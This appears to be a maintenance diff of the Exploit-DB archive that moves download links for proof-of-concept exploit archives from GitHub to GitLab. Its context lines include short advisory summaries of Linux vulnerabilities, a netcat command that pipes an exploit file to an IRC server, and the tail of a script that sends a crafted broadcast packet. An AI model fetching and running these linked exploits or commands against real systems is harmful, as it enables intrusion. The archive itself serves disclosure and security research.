a/exploits/linux/local/41973.txt +++ b/exploits/linux/local/41973.txt @@ -141,4 +141,4 @@ PoC Filename: xen_ptuaf_hv_shellcode_exec.tar Proofs of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41973.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41973.zip \ No newline at end of file diff --git a/exploits/linux/local/42611.txt b/exploits/linux/local/42611.txt index 77db6a43a..b2cb1046c 100644 --- a/exploits/linux/local/42611.txt +++ b/exploits/linux/local/42611.txt @@ -27,4 +27,4 @@ For how to create the malicious gems, see the attached file src.tar.gz. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42611.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42611.zip \ No newline at end of file diff --git a/exploits/linux/local/43006.txt b/exploits/linux/local/43006.txt index 53ac046ec..02423d455 100644 --- a/exploits/linux/local/43006.txt +++ b/exploits/linux/local/43006.txt @@ -86,4 +86,4 @@ Timeline disclosure 2017-10-12 Vendor contacted, replied to create a public issue on GitHub 2017-10-13 Created public issue on GitHub -2017-10-13 Advisory release +2017-10-13 Advisory release \ No newline at end of file diff --git a/exploits/linux/local/43007.txt b/exploits/linux/local/43007.txt index b9db9d140..954b02ec8 100644 --- a/exploits/linux/local/43007.txt +++ b/exploits/linux/local/43007.txt @@ -190,4 +190,4 @@ Timeline disclosure 2017-10-12 Vendor contacted, replied to create a public issue on GitHub 2017-10-13 Created public issues on GitHub -2017-10-13 Advisory release +2017-10-13 Advisory release \ No newline at end of file diff --git a/exploits/linux/local/43127.c b/exploits/linux/local/43127.c index 0cabad9c0..956f11374 100644 --- a/exploits/linux/local/43127.c +++ b/exploits/linux/local/43127.c @@ -1001,4 +1001,4 @@ int main() { unseccomp(); return 0; -} +} \ No newline at end of file diff --git a/exploits/linux/local/44204.md b/exploits/linux/local/44204.md index 56e05fbdc..f4015b176 100644 --- a/exploits/linux/local/44204.md +++ b/exploits/linux/local/44204.md @@ -41,4 +41,4 @@ Liang Chen, WEBKIT EVERYWHERE: SECURE OR NOT? [BHEU14] (https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not.PDF) -Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44204.zip +Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44204.zip \ No newline at end of file diff --git a/exploits/linux/local/44205.md b/exploits/linux/local/44205.md index 05c26575a..efde0adfa 100644 --- a/exploits/linux/local/44205.md +++ b/exploits/linux/local/44205.md @@ -13,4 +13,4 @@ $ make # Reference [Exploiting “BadIRET” vulnerability (CVE-2014-9322, Linux kernel privilege escalation)](https://blogs.bromium.com/exploiting-badiret-vulnerability-cve-2014-9322-linux-kernel-privilege-escalation/) -Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44205.zip +Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44205.zip \ No newline at end of file diff --git a/exploits/linux/local/45372.txt b/exploits/linux/local/45372.txt index 733b0ee48..f1bd79b1e 100644 --- a/exploits/linux/local/45372.txt +++ b/exploits/linux/local/45372.txt @@ -11,4 +11,4 @@ The proof-of-concept exploit code with process continuation and connect back ove https://www.voidsecurity.in/2018/08/from-compiler-optimization-to-code.html https://github.com/renorobert/virtualbox-cve-2018-2844 -Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45372.zip \ No newline at end of file +Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45372.zip \ No newline at end of file diff --git a/exploits/linux/local/45407.txt b/exploits/linux/local/45407.txt index 5a63e65a6..006e8e71c 100644 --- a/exploits/linux/local/45407.txt +++ b/exploits/linux/local/45407.txt @@ -288,4 +288,4 @@ uid=1000(gjannhtest1) gid=1000(gjannhtest1) groups=1000(gjannhtest1),20(dialout) Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45407.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45407.zip \ No newline at end of file diff --git a/exploits/linux/local/45497.txt b/exploits/linux/local/45497.txt index 0726abda6..f8fd9970e 100644 --- a/exploits/linux/local/45497.txt +++ b/exploits/linux/local/45497.txt @@ -127,4 +127,4 @@ root@ubuntu-18-04-vm:~/vmacache# Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45497.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45497.zip \ No newline at end of file diff --git a/exploits/linux/local/45573.txt b/exploits/linux/local/45573.txt index ef57e1ac0..91912cbfc 100644 --- a/exploits/linux/local/45573.txt +++ b/exploits/linux/local/45573.txt @@ -53,4 +53,4 @@ This software comes with NO WARRANTY: see the file PUBLIC for details. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45573.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45573.zip \ No newline at end of file diff --git a/exploits/linux/local/45631.md b/exploits/linux/local/45631.md index b1a37fe99..c0016ea23 100644 --- a/exploits/linux/local/45631.md +++ b/exploits/linux/local/45631.md @@ -7,7 +7,7 @@ go with some technical details. ## TL;DR [Here](https://github.com/joernchen/poc-submodule) is a PoC repository. -EDB Note: Mirror ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45631.zip +EDB Note: Mirror ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45631.zip ## Exploitation diff --git a/exploits/linux/local/45886.txt b/exploits/linux/local/45886.txt index a0d88d2b9..6fb2781b1 100644 --- a/exploits/linux/local/45886.txt +++ b/exploits/linux/local/45886.txt @@ -174,4 +174,4 @@ this.) Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45886.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45886.zip \ No newline at end of file diff --git a/exploits/linux/local/46359.md b/exploits/linux/local/46359.md index 2b8f370f7..4c206be73 100644 --- a/exploits/linux/local/46359.md +++ b/exploits/linux/local/46359.md @@ -10,4 +10,4 @@ payload. It'll also overwrite `/bin/sh` inside the container. More complete explanation [here](https://github.com/lxc/lxc/commit/6400238d08cdf1ca20d49bafb85f4e224348bf9d). -Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46359.zip \ No newline at end of file +Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46359.zip \ No newline at end of file diff --git a/exploits/linux/local/46361.py b/exploits/linux/local/46361.py index d3adb661d..5402f6ff8 100755 --- a/exploits/linux/local/46361.py +++ b/exploits/linux/local/46361.py @@ -81,7 +81,7 @@ Public advisory links: - https://usn.ubuntu.com/3887-1/ -Proof of Concept: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46361.zip +Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46361.zip """ """ diff --git a/exploits/linux/local/46362.py b/exploits/linux/local/46362.py index 19c506997..0e5eb9c86 100755 --- a/exploits/linux/local/46362.py +++ b/exploits/linux/local/46362.py @@ -81,7 +81,7 @@ Public advisory links: - https://usn.ubuntu.com/3887-1/ -Proof of Concept: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46361.zip +Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46361.zip """ """ diff --git a/exploits/linux/local/46369.md b/exploits/linux/local/46369.md index 3a7e17b21..b57fa282a 100644 --- a/exploits/linux/local/46369.md +++ b/exploits/linux/local/46369.md @@ -78,4 +78,4 @@ IN THE SOFTWARE. ``` -Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46369.zip +Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46369.zip \ No newline at end of file diff --git a/exploits/linux/local/47133.txt b/exploits/linux/local/47133.txt index 0a9173336..ddfb3aba8 100644 --- a/exploits/linux/local/47133.txt +++ b/exploits/linux/local/47133.txt @@ -193,4 +193,4 @@ within a second. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47133.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47133.zip \ No newline at end of file diff --git a/exploits/linux/local/47164.sh b/exploits/linux/local/47164.sh index 982d697eb..5e220ea99 100755 --- a/exploits/linux/local/47164.sh +++ b/exploits/linux/local/47164.sh @@ -1,6 +1,6 @@ #!/bin/sh # -# EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47164.zip +# EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47164.zip # # wrapper for Jann Horn's exploit for CVE-2018-18955 # uses crontab technique diff --git a/exploits/linux/local/47165.sh b/exploits/linux/local/47165.sh index 098a25af7..0e8ad8788 100755 --- a/exploits/linux/local/47165.sh +++ b/exploits/linux/local/47165.sh @@ -1,6 +1,6 @@ #!/bin/sh # -# EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47165.zip +# EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47165.zip # # wrapper for Jann Horn's exploit for CVE-2018-18955 # uses dbus service technique diff --git a/exploits/linux/local/47166.sh b/exploits/linux/local/47166.sh index 57c95d82f..c68e1108b 100755 --- a/exploits/linux/local/47166.sh +++ b/exploits/linux/local/47166.sh @@ -1,6 +1,6 @@ #!/bin/sh # -# EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47166.zip +# EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47166.zip # # wrapper for Jann Horn's exploit for CVE-2018-18955 # uses ld.so.preload technique diff --git a/exploits/linux/local/47167.sh b/exploits/linux/local/47167.sh index 77e7c19ee..432a14472 100755 --- a/exploits/linux/local/47167.sh +++ b/exploits/linux/local/47167.sh @@ -1,6 +1,6 @@ #!/bin/sh # -# EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47167.zip +# EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47167.zip # # wrapper for Jann Horn's exploit for CVE-2018-18955 # uses polkit technique diff --git a/exploits/linux/local/7855.txt b/exploits/linux/local/7855.txt index ae4019cf5..2db3b1184 100644 --- a/exploits/linux/local/7855.txt +++ b/exploits/linux/local/7855.txt @@ -3,6 +3,6 @@ PostgreSQL UDF for command execution [1] http://bernardodamele.blogspot.com/2009/01/command-execution-with-postgresql-udf.html [2] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/postgresqludfsys/lib_postgresqludf_sys_0.0.1.tar.gz -mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/7855.tar.gz (2009-lib_postgresqludf_sys_0.0.1.tar.gz) +mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/7855.tar.gz (2009-lib_postgresqludf_sys_0.0.1.tar.gz) # milw0rm.com [2009-01-25] \ No newline at end of file diff --git a/exploits/linux/local/7856.txt b/exploits/linux/local/7856.txt index e07e01b7e..10b3d6074 100644 --- a/exploits/linux/local/7856.txt +++ b/exploits/linux/local/7856.txt @@ -3,6 +3,6 @@ MySQL UDF for command execution [1] http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html [2] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/mysqludfsys/lib_mysqludf_sys_0.0.3.tar.gz -mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/7856.tar.gz (2009-lib_mysqludf_sys_0.0.3.tar.gz) +mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/7856.tar.gz (2009-lib_mysqludf_sys_0.0.3.tar.gz) # milw0rm.com [2009-01-25] \ No newline at end of file diff --git a/exploits/linux/local/9191.txt b/exploits/linux/local/9191.txt index 1f730a793..2cbf87d1d 100644 --- a/exploits/linux/local/9191.txt +++ b/exploits/linux/local/9191.txt @@ -301,6 +301,6 @@ http://grsecurity.net/~spender/cheddar_bay.tgz -backup: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/9191.tgz (2009-cheddar_bay.tgz) +backup: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/9191.tgz (2009-cheddar_bay.tgz) # milw0rm.com [2009-07-17] \ No newline at end of file diff --git a/exploits/linux/local/9208.txt b/exploits/linux/local/9208.txt index cb7a0d4e1..463b6fb90 100644 --- a/exploits/linux/local/9208.txt +++ b/exploits/linux/local/9208.txt @@ -50,6 +50,6 @@ i686 Intel(R) Pentium(R) Dual CPU T3400 @ 2.16GHz GenuineIntel GNU/Linux ------------------------------------ -download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/9208.tar.gz (2009-pulseaudio-exp.tar.gz) +download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/9208.tar.gz (2009-pulseaudio-exp.tar.gz) # milw0rm.com [2009-07-20] \ No newline at end of file diff --git a/exploits/linux/local/9435.txt b/exploits/linux/local/9435.txt index 190d7d3a4..559707079 100644 --- a/exploits/linux/local/9435.txt +++ b/exploits/linux/local/9435.txt @@ -30,6 +30,6 @@ http://www.youtube.com/watch?v=arAfIp7YzZ4 */ http://www.grsecurity.net/~spender/wunderbar_emporium.tgz -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/9435.tgz (2009-wunderbar_emporium.tgz) +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/9435.tgz (2009-wunderbar_emporium.tgz) # milw0rm.com [2009-08-14] \ No newline at end of file diff --git a/exploits/linux/local/9436.txt b/exploits/linux/local/9436.txt index 3cf9d190a..f57b82201 100644 --- a/exploits/linux/local/9436.txt +++ b/exploits/linux/local/9436.txt @@ -4,6 +4,6 @@ Quick and dirty exploit for this one: http://www.frasunek.com/proto_ops.tgz -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/9436.tgz (2009-proto_ops.tgz) +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/9436.tgz (2009-proto_ops.tgz) # milw0rm.com [2009-08-14] \ No newline at end of file diff --git a/exploits/linux/local/9574.txt b/exploits/linux/local/9574.txt index 466a2d722..29810ea8a 100644 --- a/exploits/linux/local/9574.txt +++ b/exploits/linux/local/9574.txt @@ -16,6 +16,6 @@ */ main: http://grsecurity.net/~spender/therebel.tgz -back: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/9574.tgz (2009-therebel.tgz) +back: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/9574.tgz (2009-therebel.tgz) # milw0rm.com [2009-09-02] \ No newline at end of file diff --git a/exploits/linux/local/9598.txt b/exploits/linux/local/9598.txt index dfc7cb7b6..7b3b57379 100644 --- a/exploits/linux/local/9598.txt +++ b/exploits/linux/local/9598.txt @@ -5,6 +5,6 @@ systems, it automatically searches in the SELinux policy rules for types with mmap_zero permission it can transition, and tries to exploit the system with that types. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/9598.tar.gz (2009-linux-sendpage2.tar.gz) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/9598.tar.gz (2009-linux-sendpage2.tar.gz) # milw0rm.com [2009-09-09] \ No newline at end of file diff --git a/exploits/linux/local/9627.txt b/exploits/linux/local/9627.txt index bbca3b921..0af543eb4 100644 --- a/exploits/linux/local/9627.txt +++ b/exploits/linux/local/9627.txt @@ -37,6 +37,6 @@ */ http://www.grsecurity.net/~spender/enlightenment.tgz -back: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/9627.tgz (2009-enlightenment.tgz) +back: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/9627.tgz (2009-enlightenment.tgz) # milw0rm.com [2009-09-10] \ No newline at end of file diff --git a/exploits/linux/local/9641.txt b/exploits/linux/local/9641.txt index f0c1e2c08..c48dd7d28 100644 --- a/exploits/linux/local/9641.txt +++ b/exploits/linux/local/9641.txt @@ -4,6 +4,6 @@ pointer workaround for data items addressing on ppc64 (i.e. functions on exploit code and libc can be referenced); Improved search and transition to SELinux types with mmap_zero permission. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/9641.tar.gz (2009-linux-sendpage3.tar.gz) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/9641.tar.gz (2009-linux-sendpage3.tar.gz) # milw0rm.com [2009-09-11] \ No newline at end of file diff --git a/exploits/linux/remote/10610.rb b/exploits/linux/remote/10610.rb index 03abe382b..140ece66c 100755 --- a/exploits/linux/remote/10610.rb +++ b/exploits/linux/remote/10610.rb @@ -147,4 +147,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end +end \ No newline at end of file diff --git a/exploits/linux/remote/18145.py b/exploits/linux/remote/18145.py index e3b2d980e..8446c892c 100755 --- a/exploits/linux/remote/18145.py +++ b/exploits/linux/remote/18145.py @@ -195,6 +195,4 @@ evil_packet = Ether(type=0x2323, dst="ff:ff:ff:ff:ff:ff") / payload print "\t[+] Evil packet length : %d"%len(evil_packet) print "\t[+] Sending packet to broadcast" -sendp(evil_packet) - - +sendp(evil_packet) \ No newline at end of file diff --git a/exploits/linux/remote/19522.txt b/exploits/linux/remote/19522.txt index 166628186..7b87cdd43 100644 --- a/exploits/linux/remote/19522.txt +++ b/exploits/linux/remote/19522.txt @@ -4,4 +4,4 @@ A vulnerability in the Linux kernel allows remote users to guess the initial seq The function 'secure_tcp_sequence_number' in the file 'drivers/char/random.c' at line 1684 is used to generate the initial sequence number. It used the MD4 hash with a set of inputs to generate the new ISN. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19522.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19522.tar.gz \ No newline at end of file diff --git a/exploits/linux/remote/19892.txt b/exploits/linux/remote/19892.txt index 75dbd0c9d..3e4eb60e1 100644 --- a/exploits/linux/remote/19892.txt +++ b/exploits/linux/remote/19892.txt @@ -4,4 +4,4 @@ A vulnerability exists in the DNS decode capabilities provided as part of the tc When tcpdump is logging to a file, it is not affected by this vulnerability. Upon reading from a file which contains recorded packets, it will enter an infinite loop when it encounters packets of this type. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19892.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19892.tar.gz \ No newline at end of file diff --git a/exploits/linux/remote/20924.txt b/exploits/linux/remote/20924.txt index 753d11a3d..182cf20f1 100644 --- a/exploits/linux/remote/20924.txt +++ b/exploits/linux/remote/20924.txt @@ -4,4 +4,4 @@ MDBMS is a free relational database management system. A buffer overflow condition exists in MDBMS. By issuing the '\s' command to display the query buffer when it contains a large amount of data, it may be possible for a remote user to trigger this condition and execute arbitrary code. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20924.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20924.tar.gz \ No newline at end of file diff --git a/exploits/linux/remote/21210.txt b/exploits/linux/remote/21210.txt index 81beb8741..905e9864a 100644 --- a/exploits/linux/remote/21210.txt +++ b/exploits/linux/remote/21210.txt @@ -8,4 +8,4 @@ Although this vulnerability exists in recent versions of X-Chat, the option to e cat 21210.exploit - | netcat server 6667 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21210.exploit \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21210.exploit \ No newline at end of file diff --git a/exploits/linux/remote/21402.txt b/exploits/linux/remote/21402.txt index a1b5ee26e..8f8fcbc30 100644 --- a/exploits/linux/remote/21402.txt +++ b/exploits/linux/remote/21402.txt @@ -4,4 +4,4 @@ A buffer overflow condition exists in the OpenSSH server. The condition is explo The vulnerability is related to the handling of Kerberos 4 TGT/AFS tokens passed by the client. An unbounded string copy operation may result in a stack overflow if the TGT/token data is malformed. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21402.tar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21402.tar \ No newline at end of file diff --git a/exploits/linux/remote/22147.c b/exploits/linux/remote/22147.c index 07d57095b..d883ff650 100644 --- a/exploits/linux/remote/22147.c +++ b/exploits/linux/remote/22147.c @@ -239,4 +239,4 @@ main(int argc, char **argv) close(fd); fprintf(stderr, "+ all done, %s is ready for use\n", argv[2]); exit(0); -} +} \ No newline at end of file diff --git a/exploits/linux/remote/22187.txt b/exploits/linux/remote/22187.txt index dd6a675bf..100f9f4eb 100644 --- a/exploits/linux/remote/22187.txt +++ b/exploits/linux/remote/22187.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/6650/info CVS is prone to a double free vulnerability in the Directory requests. An attacker may potentially take advantage of this issue to cause heap memory to be corrupted with attacker-supplied values, which may result in execution of arbitrary code. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22187.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22187.tar.gz \ No newline at end of file diff --git a/exploits/linux/remote/22264.txt b/exploits/linux/remote/22264.txt index a3c4c9b84..90c4cc779 100644 --- a/exploits/linux/remote/22264.txt +++ b/exploits/linux/remote/22264.txt @@ -6,4 +6,4 @@ The information loss was reduced in OpenSSL versions 0.9.6i and 0.9.7a. It is no *It should be noted that this attack is reportedly difficult to exploit and requires that the adversary be a man-in-the-middle. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22264.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22264.tar.gz \ No newline at end of file diff --git a/exploits/linux/remote/22584.txt b/exploits/linux/remote/22584.txt index dfd384f1e..dd706d46d 100644 --- a/exploits/linux/remote/22584.txt +++ b/exploits/linux/remote/22584.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/7550/info Info-ZIP UnZip contains a vulnerability during the handling of pathnames for archived files. Specifically, when certain encoded characters are inserted into '../' directory traversal sequences, the creator of the archive can cause the file to be extracted to arbitrary locations on the filesystem - including paths containing system binaries and other sensitive or confidential information. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22584.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22584.zip \ No newline at end of file diff --git a/exploits/linux/remote/23082.txt b/exploits/linux/remote/23082.txt index eb09d29d6..bc723b083 100644 --- a/exploits/linux/remote/23082.txt +++ b/exploits/linux/remote/23082.txt @@ -1,4 +1,4 @@ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23082.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23082.zip SSH Tectia Remote Authentication Bypass Tectia is the commercial OpenSSH solution. The product can be found at: diff --git a/exploits/linux/remote/23728.txt b/exploits/linux/remote/23728.txt index fb3666849..301383fd4 100644 --- a/exploits/linux/remote/23728.txt +++ b/exploits/linux/remote/23728.txt @@ -2,12 +2,12 @@ source: https://www.securityfocus.com/bid/9692/info Metamail has been reported prone to multiple vulnerabilities that may provide for arbitrary code execution. Two buffer overflow vulnerabilities have been reported to affect Metamail. Additionally, two format string-handling vulnerabilities have been reported. These issues may also be exploited by a remote attacker to execute arbitrary code. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23728-1.splitmail +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23728-1.splitmail -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23728-2.tgz +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23728-2.tgz -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23728-3 +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23728-3 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23728-4 +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23728-4 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23728-5 \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23728-5 \ No newline at end of file diff --git a/exploits/linux/remote/23881.txt b/exploits/linux/remote/23881.txt index c90389fc4..6934a3bde 100644 --- a/exploits/linux/remote/23881.txt +++ b/exploits/linux/remote/23881.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/9974/info Multiple locally and remotely exploitable buffer overrun and format strings were reported in emil. This could permit execution of arbitrary code in the context of the software. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23881.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23881.tar.gz \ No newline at end of file diff --git a/exploits/linux/remote/24784.txt b/exploits/linux/remote/24784.txt index 45664b602..7e92deccd 100644 --- a/exploits/linux/remote/24784.txt +++ b/exploits/linux/remote/24784.txt @@ -4,4 +4,4 @@ The file command is affected by a buffer overflow vulnerability. This issue is d An attacker may leverage this issue to execute arbitrary code with the privileges of a user that processes the malicious file with the affected utility. This may be leveraged to escalate privileges or to gain unauthorized access. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24784.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24784.zip \ No newline at end of file diff --git a/exploits/linux/remote/24848.txt b/exploits/linux/remote/24848.txt index 1610be2f5..7781ea85a 100644 --- a/exploits/linux/remote/24848.txt +++ b/exploits/linux/remote/24848.txt @@ -8,4 +8,4 @@ If a user obtains this file and processes it through ChBg, the attacker-supplied ChBg 1.5 is reported prone to this vulnerability. It is likely that other versions are affected as well. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24848.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24848.zip \ No newline at end of file diff --git a/exploits/linux/remote/24852.txt b/exploits/linux/remote/24852.txt index 7858b865f..c67428d07 100644 --- a/exploits/linux/remote/24852.txt +++ b/exploits/linux/remote/24852.txt @@ -4,4 +4,4 @@ A remote client-side buffer overflow vulnerability affects mpg123. This issue is An attacker may exploit this issue to execute arbitrary code with the privileges of the user that activated the vulnerable application. This may facilitate unauthorized access or privilege escalation. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24852.list \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24852.list \ No newline at end of file diff --git a/exploits/linux/remote/24977.txt b/exploits/linux/remote/24977.txt index 0e0325181..d0166e2e4 100644 --- a/exploits/linux/remote/24977.txt +++ b/exploits/linux/remote/24977.txt @@ -4,7 +4,7 @@ CUPS is reported prone to a remote buffer overflow vulnerability. The issue is r A remote attacker may exploit this condition to execute arbitrary code in the context of the vulnerable CUPS daemon. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24977.gz +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24977.gz diff --git a/exploits/linux/remote/24978.txt b/exploits/linux/remote/24978.txt index a2779d10b..302639ae9 100644 --- a/exploits/linux/remote/24978.txt +++ b/exploits/linux/remote/24978.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/11969/info It is reported that the xine media library is affected by a remote buffer overflow vulnerability. This issue can allow a remote attacker to gain unauthorized access to a vulnerable computer. The overflow condition presents itself in the 'demux_aiff.c' file. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24978.avi \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24978.avi \ No newline at end of file diff --git a/exploits/linux/remote/25005.txt b/exploits/linux/remote/25005.txt index 0e72ff5f2..88ed7c3c7 100644 --- a/exploits/linux/remote/25005.txt +++ b/exploits/linux/remote/25005.txt @@ -4,4 +4,4 @@ NASM is prone to a buffer overflow. This condition is exposed when the applicati Successful exploitation will permit arbitrary code execution with the privileges of the user running the application. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25005.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25005.zip \ No newline at end of file diff --git a/exploits/linux/remote/25006.txt b/exploits/linux/remote/25006.txt index 2dd480054..927b4a91f 100644 --- a/exploits/linux/remote/25006.txt 